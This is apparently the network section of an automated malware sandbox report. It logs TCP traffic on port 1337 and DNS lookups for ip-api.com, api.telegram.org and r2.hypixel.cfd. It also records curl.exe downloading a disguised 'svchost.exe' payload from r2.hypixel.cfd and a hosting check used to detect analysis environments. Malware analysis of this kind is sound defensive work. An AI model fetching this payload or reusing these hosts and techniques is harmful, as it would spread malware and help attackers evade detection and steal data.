                                                                                                                Nov 23, 2024 21:04:54.281681061 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.281735897 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:54.388194084 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.488960981 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.489032030 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:54.589382887 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.608568907 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.608634949 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:54.690402985 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.728346109 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.728415012 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:54.801517010 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.848613024 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:04:54.848808050 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:04:54.972477913 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.003519058 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.129995108 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.130043983 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.256396055 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.256453037 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.363403082 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.439035892 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.439091921 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.559204102 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.564582109 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.566683054 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.640703917 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.689974070 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.730009079 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.730220079 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.760385036 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.849776030 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:00.849831104 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:00.971438885 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:03.486964941 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:03.606628895 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:03.840384007 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:03.842107058 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:03.962582111 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:05.053093910 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:05.098045111 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:06.752731085 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:06.872385979 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:06.872452974 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:06.993375063 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:07.107572079 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:07.111881018 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:07.231482029 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:07.308686972 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:07.310410976 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:07.458925009 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:09.161082983 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:09.280936956 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:09.514456987 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:09.516554117 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:09.639548063 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.128155947 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:12.247791052 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.247845888 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:12.369294882 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.471437931 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:12.481178045 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.594890118 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.594933033 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:12.682710886 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.720156908 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.720220089 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:12.939235926 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.939275026 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:12.941566944 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:13.061101913 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:14.596746922 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:14.716644049 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:14.950022936 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:14.951463938 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:15.071201086 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:26.534181118 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:26.653887987 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:26.887002945 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:26.894889116 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:27.021285057 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:31.287399054 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:31.407622099 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:31.641024113 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:31.653759003 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:31.776518106 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:35.069156885 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:35.300190926 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:38.284069061 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:38.406929970 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:38.596668005 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:38.640134096 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:38.690026999 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:38.716481924 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:38.716530085 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:38.836344957 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:38.893944979 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:38.949522972 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.017621040 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.017668962 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:39.137232065 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.145176888 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:39.250890970 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.264964104 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.265256882 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:39.387027025 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.497895956 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.502159119 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:39.622164011 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.625885963 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:39.745676041 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.978713989 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:39.986160994 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:40.105921984 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:44.191843033 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:44.318336964 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:44.551660061 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:44.555068016 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:44.674662113 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:49.240580082 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:49.360735893 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:49.594079018 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:49.604418993 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:49.727757931 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:50.128129005 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:50.247967958 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:50.248028040 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:50.368849039 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:50.497744083 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:50.499486923 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:50.626302004 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:50.698991060 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:50.700759888 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:50.821398973 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:51.237531900 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:51.357729912 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:51.591337919 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:51.593220949 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:51.713041067 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:55.383665085 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:55.503506899 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:55.751418114 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:05:55.800376892 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:55.860452890 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:05:55.987978935 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:00.347052097 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:00.468137026 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:00.468199968 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:00.587801933 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:00.701370001 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:00.704112053 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:00.828885078 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:00.902762890 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:00.904479980 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:01.025840998 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:01.526225090 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:01.646843910 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:01.878874063 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:01.903762102 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:02.027777910 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:02.027894020 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:02.256622076 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:02.489633083 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:02.491826057 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:02.614104986 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:05.390110016 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:05.487042904 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:15.038310051 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:15.158741951 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:15.391980886 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:15.396262884 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:15.515999079 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:15.786698103 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:15.912756920 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:15.912815094 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:16.032449961 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:16.150187969 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:16.228275061 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:16.348834038 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:16.362651110 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:16.457195997 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:16.550014973 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:16.622029066 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:16.624665022 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:16.746304035 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:28.832623005 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:28.954075098 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:29.187457085 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:29.190148115 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:29.342803001 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:34.021331072 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:34.176650047 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:34.374192953 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:34.488370895 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:34.570564032 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:34.696974993 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:35.084989071 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:35.235085011 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:42.442383051 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:42.562393904 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:42.797189951 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:42.806358099 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:42.926053047 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:44.472848892 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:44.593959093 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:44.827208042 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:44.832140923 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:45.075638056 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:46.146815062 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:46.270375013 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:46.503446102 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:46.596676111 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:46.631865978 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:46.751506090 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:51.162147999 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:51.288719893 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:51.522126913 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:51.526216030 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:51.645756960 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:51.910435915 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:52.036592007 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:52.270009041 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:06:52.273834944 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:06:52.393414021 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:00.566020966 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:07:00.691210032 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:00.928713083 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:00.932229996 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:07:01.058651924 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:02.019505978 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:07:02.139189959 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:02.376681089 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:02.382412910 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:07:02.503319025 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:02.848654032 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:07:02.968725920 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:03.202099085 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:03.206394911 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:07:03.327038050 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:05.084424973 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:05.273020983 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:07:08.238821983 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:07:08.358469009 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:08.592032909 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:08.595658064 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:07:08.715286016 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:11.394134998 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:07:11.513714075 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:11.747247934 CET133749711104.198.168.179192.168.2.7
                                                                                                                Nov 23, 2024 21:07:11.749735117 CET497111337192.168.2.7104.198.168.179
                                                                                                                Nov 23, 2024 21:07:11.869383097 CET133749711104.198.168.179192.168.2.7

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Nov 23, 2024 21:03:03.273665905 CET5135253192.168.2.71.1.1.1
                                                                                                                Nov 23, 2024 21:03:03.600261927 CET53513521.1.1.1192.168.2.7
                                                                                                                Nov 23, 2024 21:03:09.960879087 CET6166753192.168.2.71.1.1.1
                                                                                                                Nov 23, 2024 21:03:10.053013086 CET5829253192.168.2.71.1.1.1
                                                                                                                Nov 23, 2024 21:03:10.191384077 CET53582921.1.1.1192.168.2.7
                                                                                                                Nov 23, 2024 21:03:13.324184895 CET5769753192.168.2.71.1.1.1
                                                                                                                Nov 23, 2024 21:03:13.469187975 CET53576971.1.1.1192.168.2.7

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Nov 23, 2024 21:03:03.273665905 CET192.168.2.71.1.1.10x1aa5Standard query (0)r2.hypixel.cfdA (IP address)IN (0x0001)false
                                                                                                                Nov 23, 2024 21:03:09.960879087 CET192.168.2.71.1.1.10x69dfStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                Nov 23, 2024 21:03:10.053013086 CET192.168.2.71.1.1.10x63d8Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                Nov 23, 2024 21:03:13.324184895 CET192.168.2.71.1.1.10x6bfaStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Nov 23, 2024 21:03:03.600261927 CET1.1.1.1192.168.2.70x1aa5No error (0)r2.hypixel.cfd172.66.0.158A (IP address)IN (0x0001)false
                                                                                                                Nov 23, 2024 21:03:03.600261927 CET1.1.1.1192.168.2.70x1aa5No error (0)r2.hypixel.cfd162.159.140.160A (IP address)IN (0x0001)false
                                                                                                                Nov 23, 2024 21:03:03.600261927 CET1.1.1.1192.168.2.70x1aa5No error (0)r2.hypixel.cfd172.66.0.102A (IP address)IN (0x0001)false
                                                                                                                Nov 23, 2024 21:03:03.600261927 CET1.1.1.1192.168.2.70x1aa5No error (0)r2.hypixel.cfd162.159.140.104A (IP address)IN (0x0001)false
                                                                                                                Nov 23, 2024 21:03:10.099325895 CET1.1.1.1192.168.2.70x69dfNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                Nov 23, 2024 21:03:10.191384077 CET1.1.1.1192.168.2.70x63d8No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                Nov 23, 2024 21:03:13.469187975 CET1.1.1.1192.168.2.70x6bfaNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • r2.hypixel.cfd
                                                                                                                • api.telegram.org
                                                                                                                • ip-api.com

                                                                                                                HTTP Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.749702208.95.112.1801456C:\Windows\StartMenuExperienceHost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 23, 2024 21:03:10.321942091 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                Host: ip-api.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Nov 23, 2024 21:03:11.511277914 CET175INHTTP/1.1 200 OK
                                                                                                                Date: Sat, 23 Nov 2024 20:03:10 GMT
                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                Content-Length: 6
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                X-Ttl: 60
                                                                                                                X-Rl: 44
                                                                                                                Data Raw: 66 61 6c 73 65 0a
                                                                                                                Data Ascii: false


                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.749701172.66.0.1584437092C:\Windows\System32\curl.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-23 20:03:04 UTC89OUTGET /svchost.exe HTTP/1.1
                                                                                                                Host: r2.hypixel.cfd
                                                                                                                User-Agent: curl/7.83.1
                                                                                                                Accept: */*
                                                                                                                2024-11-23 20:03:05 UTC934INHTTP/1.1 200 OK
                                                                                                                Date: Sat, 23 Nov 2024 20:03:05 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 79872
                                                                                                                Connection: close
                                                                                                                ETag: "9d9d23a73f3b3f53e8581d8bb31953c4"
                                                                                                                Last-Modified: Fri, 22 Nov 2024 20:00:41 GMT
                                                                                                                Vary: Accept-Encoding
                                                                                                                Cache-Control: max-age=14400
                                                                                                                CF-Cache-Status: REVALIDATED
                                                                                                                Accept-Ranges: bytes
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CcicP5IChQMiVPpWC5KmNbNJnJ0YujR3tmrI%2BjZEvk54tYWHovOgfjq%2FWTfLKkw4M2iB9Y4j7D7%2FoH1X94e%2FhZB0TMklO2yI%2FF7yP4Ql4Td4v2v%2B4fKK5hO3hNM8%2Feavug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e73c2b5890d236b-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1794&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2865&recv_bytes=727&delivery_rate=1574973&cwnd=163&unsent_bytes=0&cid=9217aedae0941d30&ts=605&x=0"
